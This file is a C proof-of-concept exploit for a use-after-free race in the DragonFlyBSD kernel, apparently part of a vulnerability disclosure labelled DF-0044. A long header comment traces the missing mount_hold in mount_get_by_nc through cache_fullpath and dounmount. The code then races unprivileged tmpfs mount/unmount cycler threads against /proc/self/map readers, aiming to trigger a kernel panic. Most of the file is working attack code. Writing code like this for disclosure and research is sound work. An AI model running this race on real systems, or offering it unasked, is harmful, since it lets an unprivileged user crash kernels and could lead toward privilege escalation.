DF-0044 / mount_uaf.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 | /* * DF-0044 PoC -- mount_get_by_nc unheld-return UAF via cache_fullpath * racing dounmount. * * CONFIRMED CODE-LEVEL BUG (master DEV, X86_64_GENERIC): * - sys/kern/vfs_mount.c:1235-1248 mount_get_by_nc() returns mp * WITHOUT calling mount_hold(mp). Token released at :1245, return * at :1247 -- no hold taken. Contrast vfs_getvfs() at :413-424 * which does mount_hold(mp) at :420-421 (comment at :410-411 * documents the contract: "the returned mp is held and the caller * is expected to drop it via mount_drop()"). mountlist_scan() at * :756/:784 also mount_hold()s before dropping the token. * mount_get_by_nc is the lone outlier and breaks the invariant. * - sys/kern/vfs_cache.c:5214 sole caller cache_fullpath() takes the * returned mp and at :5224 dereferences new_mp->mnt_ncmounton AFTER * the mountlist_token has been released. It never mount_drop()s. * - sys/kern/vfs_syscalls.c:1040,1066-1069,1108-1117 dounmount() * removes mp from mountlist, zeroes mnt_ncmounton, waits for * mnt_refs==0, then mount_drop(mp) -> kfree(mp, M_MOUNT) once * mnt_hold hits 0. That kfree frees the very struct the unheld * pointer in cache_fullpath still points at -> UAF. * * The ONLY caller of cache_fullpath(guess=1) is procfs_map.c:181 * (vn_fullpath(p, vp, ..., 1) when reading /proc/$pid/map). So the * deref side must read /proc/$pid/map for a vnode whose path traverses * the cycled mountpoint. * * This PoC drives BOTH sides concurrently. The binary is placed INSIDE * the cycled mount, so its text vp is on the cycled mount. Reading * /proc/self/map then drives vn_fullpath(p, p_textvp, ..., 1) -> * cache_fullpath(guess=1) -> mount_get_by_nc. Meanwhile, N cyclers * mount+unmount the path to free struct mount through kfree. * * Build (DragonFlyBSD, as unpriv user): cc -pthread -O2 -o mount_uaf ... * Run (place binary INSIDE the mountpoint; vfs.usermount=1; * disposable VM): ./mount_uaf /tmp/df0044/m 60 * * NOTE: this race is extremely tight on a non-INVARIANTS kernel. * The deref is a single memory read; the unmount's kfree is gated by * an mnt_refs drain that usually completes only after the deref. * A panic in _cache_hold on a bogus ncp, a slab-allocator complaint, * or a fatal trap in vfs_cache.c during the deref window is the * expected signature when the race is won. If the guest stays up, * the race was not won this run -- the code-level proof in * VERDICT.md stands regardless. */ #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <pthread.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mount.h> #include <sys/stat.h> #include <sys/types.h> /* tmpfs mount-info struct (sys/vfs/tmpfs/tmpfs_mount.h). * We need to set ta_root_uid = getuid() so the mount is owned by us * and we can unmount it without MNT_FORCE (which is privileged). * Otherwise tmpfs_statfs overwrites mnt_stat.f_owner with tm_root->tn_uid * (default 0 = root), and sys_unmount then denies us with EPERM * (mnt_stat.f_owner != our uid && no priv). */ #define TMPFS_ARGS_VERSION 2 struct tmpfs_mount_info { int ta_version; long long ta_nodes_max; /* ino_t */ long long ta_size_max; /* off_t */ unsigned long long ta_maxfsize_max; /* size_t */ unsigned int ta_root_uid; /* uid_t */ unsigned int ta_root_gid; /* gid_t */ unsigned short ta_root_mode; /* mode_t */ }; static char mpoint[512]; static volatile int go = 1; static volatile unsigned long long iter_deref = 0; static volatile unsigned long long iter_free = 0; static volatile unsigned long long iter_free_fail = 0; /* Free side: cycle mount+umount of mpoint to recycle struct mount * through kfree. No MNT_FORCE needed (we own the mount). */ static void * mount_cycler(void *a) { (void)a; while (go) { struct tmpfs_mount_info mi; memset(&mi, 0, sizeof(mi)); mi.ta_version = TMPFS_ARGS_VERSION; mi.ta_root_uid = getuid(); mi.ta_root_gid = getgid(); mi.ta_root_mode = 0755; int mr = mount("tmpfs", mpoint, 0, &mi); if (mr != 0) { /* Maybe leftover from a peer thread -- try cleanup. */ iter_free_fail++; unmount(mpoint, 0); continue; } /* Plain unmount: nothing holds vnodes on the fresh tmpfs. */ int ur = unmount(mpoint, 0); if (ur == 0) iter_free++; else iter_free_fail++; } return NULL; } /* Deref side: read /proc/self/map. procfs_map.c:181 calls * vn_fullpath(p, vp, ..., 1) for each vnode-backed vmap. Our text vp * (this binary) lives inside mpoint, so its path traverses the cycled * mountpoint, exercising cache_fullpath(guess=1) -> mount_get_by_nc. */ static void * map_reader(void *a) { (void)a; char buf[65536]; while (go) { int fd = open("/proc/self/map", O_RDONLY); if (fd < 0) { usleep(50); continue; } ssize_t n; while ((n = read(fd, buf, sizeof(buf))) > 0) { iter_deref++; } close(fd); } return NULL; } int main(int argc, char **argv) { if (argc > 1) snprintf(mpoint, sizeof(mpoint), "%s", argv[1]); else if (getcwd(mpoint, sizeof(mpoint)) == NULL) { perror("getcwd"); return 2; } unsigned int secs = 30; if (argc > 2) secs = (unsigned int)atoi(argv[2]); unsigned int nfree = 2; if (argc > 3) nfree = (unsigned int)atoi(argv[3]); fprintf(stderr, "DF-0044: cycling mount at %s (uid=%u gid=%u)\n", mpoint, getuid(), getgid()); fprintf(stderr, "DF-0044: %u cycler threads + 4 /proc/self/map readers\n", nfree); fprintf(stderr, "DF-0044: running %u seconds\n", secs); pthread_t tfree[16], tderef[4]; for (unsigned int i = 0; i < nfree && i < 16; i++) pthread_create(&tfree[i], NULL, mount_cycler, NULL); for (int i = 0; i < 4; i++) pthread_create(&tderef[i], NULL, map_reader, NULL); sleep(secs); go = 0; for (unsigned int i = 0; i < nfree && i < 16; i++) pthread_join(tfree[i], NULL); for (int i = 0; i < 4; i++) pthread_join(tderef[i], NULL); fprintf(stderr, "DF-0044: deref=%llu free_ok=%llu free_fail=%llu\n", iter_deref, iter_free, iter_free_fail); fprintf(stderr, "DF-0044: still alive -- race not won this run\n"); return 0; } |